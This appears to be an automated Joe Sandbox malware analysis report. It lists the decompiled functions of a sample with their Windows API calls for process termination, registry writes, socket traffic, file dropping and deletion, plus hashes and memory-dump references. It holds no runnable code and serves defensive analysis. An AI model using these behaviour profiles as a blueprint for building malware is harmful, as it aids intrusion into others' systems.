                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$ExchangeInterlocked
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3054446656-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9aaa443274d333fd06c5716741a534f2c6798fb78c35c51775e4066f0ebc5c42
                                                                                                                                                                                                                                                                                            • Instruction ID: c4c35d5d7c965c97ecce2d4a11f4f6349bab93835f4df6adf142463e6b21256d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aaa443274d333fd06c5716741a534f2c6798fb78c35c51775e4066f0ebc5c42
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431C4B6F00145ABD714DF65E885AEE7B76AFE8700F14C13AF505976A4CA78C940CB60
                                                                                                                                                                                                                                                                                            Function 01439ACF Relevance: 9.0, APIs: 6, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(014326E0,40000000,00000000,00000000,00000003,00000000,00000000,?,01439E89), ref: 01439AF1
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 01439B0B
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 01439B20
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 01439B2A
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,000000FF,00000004,00000000,00000000), ref: 01439B42
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01439B4C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2603052737-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5b02ee9879d77f2184869c57597977fec13ff92eea1964c1e9fda94246ed1758
                                                                                                                                                                                                                                                                                            • Instruction ID: 914be022561dd8eedf72ac871333d4e89956e978601770287e55391f86139250
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b02ee9879d77f2184869c57597977fec13ff92eea1964c1e9fda94246ed1758
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED01D775A40208BBEB24DFB4DC49F9EBB78AB48B11F508248FB11AA2D4D6B46644CB54
                                                                                                                                                                                                                                                                                            Function 01434F36 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96registrystringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01434F6B
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01434FFF
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01435021
                                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 0143504B
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 0143505A
                                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0143507A
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0143508C
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01435100
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435153
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0143518F
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0143543A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                                                                                                                                                                                                                                                                            • String ID: userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 3359840872-3509716881
                                                                                                                                                                                                                                                                                            • Opcode ID: 5eaedb8444dffd5c9e6e86e360b6c9d00cba8209fda3d2ebe509eec8af40b626
                                                                                                                                                                                                                                                                                            • Instruction ID: 30691dee158a75d3e13e2c0c1206caa35ce4a74a2bec4e7f46c86eabc86cdd88
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eaedb8444dffd5c9e6e86e360b6c9d00cba8209fda3d2ebe509eec8af40b626
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 764168F5805228DBCB20DF61EC85AE9F774AB9C301F0882CBE5196A260DA735B94CF50
                                                                                                                                                                                                                                                                                            Function 0143811C Relevance: 7.6, APIs: 5, Instructions: 103networkmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 01437FA9: select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 014380DA
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 014381A1
                                                                                                                                                                                                                                                                                            • recv.WS2_32(00000000,00000008,00000400,00000000), ref: 014381F0
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01438247
                                                                                                                                                                                                                                                                                            • send.WS2_32(00000000,00000000,?,00000000), ref: 0143826D
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 01438283
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$AllocFreeclosesocketrecvselectsend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 424924859-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 650d1e932c3d1809559610847685d715b042383a6f8a0e95f8717a35f4fb53df
                                                                                                                                                                                                                                                                                            • Instruction ID: 4fffd8cc68e5d70f86bf35c54f33d7fbc3da8497533d8e5d8791eb4912513c14
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 650d1e932c3d1809559610847685d715b042383a6f8a0e95f8717a35f4fb53df
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A041A07090020AEFDF64CF58CC44BEAB775BB98705F10829AF648A72A0DB749A84CF50
                                                                                                                                                                                                                                                                                            Function 014392F3 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 01439322
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0143932F
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433C90), ref: 0143934E
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01432288), ref: 01439362
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,0143268C), ref: 01439375
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$DirectorySystemlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3692445580-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 01007861796dd710a6eea4adf8709b6e0785df7cdde53446f404643f5c75f6a3
                                                                                                                                                                                                                                                                                            • Instruction ID: 4a9eccac01a28dcc4a0424ff479a5efcd625894edcb40636f1c81ccebd791a63
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01007861796dd710a6eea4adf8709b6e0785df7cdde53446f404643f5c75f6a3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D2160FAA00218ABDB30DB64DC48FAA7778BB4CB05F008199F709B3194CB705A45CF64
                                                                                                                                                                                                                                                                                            Function 0143940A Relevance: 7.6, APIs: 5, Instructions: 68sleepstringthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000), ref: 0143945E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000080), ref: 0143947B
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01439495
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0002D000), ref: 014394BF
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 014394EC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$ExitThreadUserlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3026710222-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0a3862a45ec07f9cf12878ef28b26af87601ac4dd9c62d56d6bc3e43d8802a44
                                                                                                                                                                                                                                                                                            • Instruction ID: 06633f39f65abf8df0450f64591aa77e3a83bf19ddf969b7dc0d461089c4b90b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a3862a45ec07f9cf12878ef28b26af87601ac4dd9c62d56d6bc3e43d8802a44
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 012195B4A443049BEB108FE4DC49BAEB7B4FB5DB55F10421AE615A63E4C7B95401CF60
                                                                                                                                                                                                                                                                                            Function 01440C4B Relevance: 7.6, APIs: 5, Instructions: 60filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01440C6E
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000022,00000000), ref: 01440CA0
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,008E2BC0,0001E200,?,00000000), ref: 01440CC6
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01440CD0
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 01440CDA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCloseCreateHandleWritelstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 96072700-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f23c07ca08aba3f03904f6a78070016d51dc599abe30107282d2a93ae806cb99
                                                                                                                                                                                                                                                                                            • Instruction ID: c3c162c663bdfb21cb786e6adac9478fa9062fc9c2c9b094753d45c066d988ca
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f23c07ca08aba3f03904f6a78070016d51dc599abe30107282d2a93ae806cb99
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D115E75A00308FBEB24CFB8D889BEE7B75AB48711F108645FB06DB2D1D6309A918B54
                                                                                                                                                                                                                                                                                            Function 0143A1F2 Relevance: 7.5, APIs: 5, Instructions: 38sleepfilestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0143A220
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0143A236
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0143A24A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00002800), ref: 0143A255
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0143A25F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1172011736-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 214aa5a6ab3db44c939edbd796d24f477b61a7b590f619563d7ab7172424a56e
                                                                                                                                                                                                                                                                                            • Instruction ID: 140b8bde0657de632e67623236b138753345e5e90521f7464b771c8805430a16
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 214aa5a6ab3db44c939edbd796d24f477b61a7b590f619563d7ab7172424a56e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7F028359402145BE7208BB8D84CBA6F778BF8C700F1002A6E716C22A0DB769904CF51
                                                                                                                                                                                                                                                                                            Function 01434631 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74stringprocessCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 014346EE
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014346FB
                                                                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0143476E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateProcesslstrcpylstrlen
                                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                                            • API String ID: 2742767947-2746444292
                                                                                                                                                                                                                                                                                            • Opcode ID: 3e3d82afadba28a3b7136becba3ce553d057f04fefef535c38a86da4a9b5c7b6
                                                                                                                                                                                                                                                                                            • Instruction ID: 5ffeeb73f87de0a42758eff25149054b126fb8ab73b4addf4184989881e787d7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e3d82afadba28a3b7136becba3ce553d057f04fefef535c38a86da4a9b5c7b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A312FB190422CDFDB61CF64CC587DABBB4AB99304F1041DAD68DAB290DBB55AC4CF80
                                                                                                                                                                                                                                                                                            Function 01435A6A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435AF0
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01435B2D
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01435BFB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseQueryValuewsprintf
                                                                                                                                                                                                                                                                                            • String ID: %c%d_%d$userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 2691868063-2326404368
                                                                                                                                                                                                                                                                                            • Opcode ID: fc002de66672c0ef08e3ed754e32f6512bc1488aa43d8744f7e14c8db63bd215
                                                                                                                                                                                                                                                                                            • Instruction ID: 0ca1c742fd8a9a86d9e854bd1eb02a8f08b6207497c3c2fd3597ee1ca15d332d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc002de66672c0ef08e3ed754e32f6512bc1488aa43d8744f7e14c8db63bd215
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B71130B4901218EBDB24CF94DC88BE9B7B4BB8C304F2441CAD2096A290C7749FC5CF54
                                                                                                                                                                                                                                                                                            Function 01435AB4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435AF0
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01435B2D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValuewsprintf
                                                                                                                                                                                                                                                                                            • String ID: %c%d_%d$userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 2072284396-2326404368
                                                                                                                                                                                                                                                                                            • Opcode ID: 300052e0bfeb3ce095c44db84644acad1f9e92644b841c38f28297cc49498659
                                                                                                                                                                                                                                                                                            • Instruction ID: 5d0c923424d314f49dde187176abb88f3cbb47336604e16f7b942cf63cba25a8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 300052e0bfeb3ce095c44db84644acad1f9e92644b841c38f28297cc49498659
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C0121B594012CEBDB24CF95DC88BE9B7B4BB4C704F2441C9E209A6250D7749B85CF54
                                                                                                                                                                                                                                                                                            Function 014382B6 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • htons.WS2_32(?), ref: 01438317
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0143834E
                                                                                                                                                                                                                                                                                              • Part of subcall function 01437C4E: socket.WS2_32(00000002,00000001,00000006), ref: 01437C83
                                                                                                                                                                                                                                                                                            • send.WS2_32(00000000,00000000,00000008,00000000), ref: 01438389
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143811C: GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 014381A1
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143811C: recv.WS2_32(00000000,00000008,00000400,00000000), ref: 014381F0
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143811C: GlobalFree.KERNEL32(00000000), ref: 01438247
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143811C: closesocket.WS2_32(000000FF), ref: 01438283
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 014383BE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
